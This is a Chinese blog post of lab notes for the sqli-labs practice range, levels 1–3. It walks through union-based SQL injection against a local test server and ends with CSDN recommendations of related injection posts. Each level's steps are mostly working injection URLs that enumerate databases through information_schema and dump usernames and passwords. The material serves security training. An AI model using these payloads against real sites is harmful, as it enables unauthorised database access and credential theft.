sql靶场笔记

已于 2022-02-09 15:22:58 修改
阅读量710 收藏
点赞数
文章标签: sql 数据库 database
于 2022-02-07 18:00:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BL_zshaom/article/details/122807940
版权
本文详细介绍了SQL注入攻击的步骤和技巧,从第一关到第三关,逐步展示了如何利用单引号闭合、联合查询、信息_schema表来探测数据库、表及数据。通过输入特殊字符,观察回显,确定数据列数,最终获取用户名和密码,揭示了SQL注入的常见手法和防范措施。
摘要由CSDN通过智能技术生成

第一关

1、判断闭合符号
通过提交

?id=1、?id=1 and 1=1、?id=2

发现有回显
在这里插入图片描述
在id后面加入反斜杠发现是单引号闭合
在这里插入图片描述

在url中加入单引号出现报错
在这里插入图片描述
2、即单引号字符型注入,我们可以使用order by X来获取列数(例如:id=1‘order by 1–+这条语句的意思是查询users表中user_id为1的数据并按第一字段排行)
而我们在输入id=1’ order by 4–+的时候报错,那么说明数据有三列。
在这里插入图片描述
3、接下来我们使用 union select 联合查询查看当前的数据库(union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示,即执行联合查询)
即:id=-1’ union select 1,2,3–+也可以(id=1’ and 1=0 union select 1,2,3–+)目的就是使union前的查询无返回结果从而返回到执行联合查询的结果
在这里插入图片描述
判断出数据在2,3列
4、对数据库和表进行注入获取数据
先查询当前数据库:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,(select database()),3--+

在这里插入图片描述
然后我们用group_concat()函数查看库中有哪些表:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

information_schema:是数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
在这里插入图片描述
也可以在第三列里爆出表名:只需把union语句放到3的位置就行
在这里插入图片描述
5、查看users表里面的内容

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

在这里插入图片描述
6、查看用户名和密码

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,(select group_concat(username,password) from users)--+

在这里插入图片描述

第二关

1、查看回显
依旧是输入?id=1、?id=1 and 1=1、?id=2
后面加入反斜杠
在这里插入图片描述
发现可以不用闭合直接查询
那么就跟第一关一样了,只不过不用加单引号。
2、使用order by
发现有三列
3、用union联合查询

?id=-1 union select 1,2,3--+

4、查看数据库

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

5、查看表中内容

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

6、获取用户名和密码

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,(select group_concat(username,password) from users)--+

第三关

1、首先输入反斜杠,发现是单引号括号闭合
在这里插入图片描述
2、order by查询
发现依旧是三列
3、联合查询

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') and 1=2 union select 1,2,3--+

4、注入获取数据库和表的数据

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

5、查看user表里的内容

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

6、查看用户名和密码

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,2,(select group_concat(username,password) from users)--+
稚少莽...
关注
sqli-labs靶场练习笔记13-18
m0_47693317的博客
05-24 161
sqli-labs13-18Less-13:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号字符型双注入)Less-14:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号(双引号)字符型注入)Less-15:POST-Blind-Boolian/time Based-Single quotes(基于POST的单引号布尔/时间盲注)Less-1
ZVulDrill靶场通关笔记
weixin_41487522的博客
12-07 2136
ZVulDirll靶场通关笔记 由于读研期间在忙论文的事情,好久没更新了,今天分享一下ZVulDirll靶场的通关。 这个靶场是我在观看web安全相关课程教学视频的时候发现的,靶场很简单,实用于新手小白学习入门,下面就是该靶场的通关笔记。 1.下载地址: github上源地址下载:https://github.com/710leo/ZVulDrill 2.环境搭建及安装: 环境搭建的话,推荐使用phpstudy,非常的方便,因为phpstudy集成了Apache+PHP+MySQL+phpMyAdmin+Z
sql靶场练习笔记2
qq_61109509的博客
02-07 2712
目录 环境:sqli靶场 Less-5 基于'字符型的错误回显注入 less-6 基于"字符型的错误回显注入 总结报错注入之updatexml语句: 总结报错注入之extractvalue语句: 总结报错注入之floor语句: Less-7 文件读写注入 总结文件注入知识 一句话木马 环境:sqli靶场 Less-5 基于'字符型的错误回显注入 输入?id=1,页面正常 输入?id=2',页面出现错误语句 尝试 ?id=1' order by 1,2,3-- -...
SQL注入攻击的简单示例
weixin_30888707的博客
05-22 320
SQL注入攻击的简单示例: statement := "SELECT * FROM Users WHERE Value= " + a_variable + " 上面这条语句是很普通的一条SQL语句,他主要实现的功能就是让用户输入一个员工编号然后查询处这个员工的信息。但是若这条语句被不法攻击者改装过后,就可能成为破坏数据的黑手。如攻击者在输入变量的时候,输...
SQL 注入漏洞(七)报错注入
不秃头的程序Yang
06-12 1093
一、代码分析 二、报错注入攻击 1、获取库名
sql注入实战—报错注入
qq_40909772的博客
07-16 800
测试网站:自建靶场 http://192.168.57.128:1237/sql/error.php?username=1 测试工具:Burp Suite 1.首先访问http://192.168.57.128:1237/sql/error.php?username=1’,因为参数username的值是1’,在数据库中执行SQL时,会因为多了一个单引号报错,输出结果如下所示:   通过页面返回的结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入来获取数据。 2.报错注入有多种格式,此
delphi中SQL避免非法字符,单引号(')出错的三种方法
wozengcong的专栏
08-30 3086
由于 ' (单引号)是SQL的标准字符符号,所以在SQL语句中间遇到 ' 时要做特殊处理。 1. 使用 QuotedStr 函数 QuotedStr的作用是使字符串包含单引号:  在字符的前后加上( ')号,因为在DELPHI中字符赋值是需要引号的 比如  CommandText   :=   CommandText   +   QuotedStr(Edit1.Text);   Sql
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-lib64关闯关笔记学习资料.zip
08-22
SQL注入SQL Injection)是一种...总之,sqli-lib64提供的资源是学习SQL注入技术的宝贵资料,通过实践和笔记分享,可以提升你的安全意识和技能,对于从事Web开发或网络安全工作的人来说,这些都是必不可少的知识点。
CSF三层主机:渗透测试靶场笔记
Zeker62的博客
03-27 5802
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略。
Sql语句中单引号'异常问题
天天开心鸭!
01-21 2312
前言: 部分项目中多多少少会用到SQL语句,但是包含英文的单引号SQL语句在执行时就会报错,需要进行转义处理 问题原因: SQL语句单引号未转义 问题报错: 解决方法: 如果是查询条件,应该尽可能使用参数化查询。 实在是要单引号,那就再加一个单引号来转义。 用两个单引号,表示一个单引号。 比如查询Name为abc'cc的 SELECT *...
SQL注入
x2813488062的博客
02-11 3010
sql注入基本知识 在Mysql5.0后提供information_schema schemata表提供了当前mysql实例中所有数据库的信息 information_schema是MySQL数据库自带的,所有可以直接查询此表,MySQL 5以下版本无此数据库 schema_name代表了所有数据库名 1.通过 ?id=1’ 和 id=1’’ 判断是否存在漏洞 ?id=1’ ?id=1” 如果都报错,则为整形闭合。 如果单引号报错,双引号不报错。 然后尝试 ?id=1’–+ 无报错
sql输入单引号总显示错误 为什么
AuthFailure的博客
09-20 4247
今天查看APP异常log,发现有个sql语句报了很多错。 具体就是某个商品名称里带了个引号,sql查询时报错。 具体解决如下: 单引号改成两个单引号(如下)即可 select * from a where name = 'a''b'
sql语句报错
最新发布
Br不二
11-15 217
ode: 'ER_PARSE_ERROR', errno: 1064, sqlMessage: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''10' OFFSET 0' at line 1", sqlState: '42000', index: 0, sql: "
SQL注入漏洞
haoge1998的博客
04-15 1234
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
SQL插入时,当存在单引号导致的插入失败
走在搬砖的路上!
10-11 567
没有找到直接转的函数,但是可以按一下几种方式处理: 1、replace() Astring.replace("'","”") 把 英式 单引号 改为 中文单引号 2、re 正则处理匹配 略 3、...
SQL注入——union获取数据库信息
m0_71714379的博客
02-05 1242
web安全学习笔记
sql注入--报错
pakho_C的博客
01-01 828
SQL注入报错靶场sqli-labs-master 下载链接:靶场下载连接 第一关源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection
sql注入基于错误-单引号-字符型
weixin_30784141的博客
08-11 658
查找注入点 在url中: 1. ' 2. and 1=1/and 1=2 3. 随即输入(整形) 4. -1/+1回显上下页面(整形) 5. and sleep(5) (判断页面返回时间) 判断有多少列 order by ..... 爆显示位: id=88888888') union select 1,2,3 --+ 先获取数据库: id=') union s...
Oracle SQL学习笔记:从基础到进阶
"这是一份由郭大喜整理的Oracle SQL学习笔记,包含了SQL的基本概念、查询语句、函数、多表...这份Oracle SQL笔记是一份全面且实用的学习资料,对于想要掌握Oracle SQL语法和数据库管理的初学者来说,是非常宝贵的资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值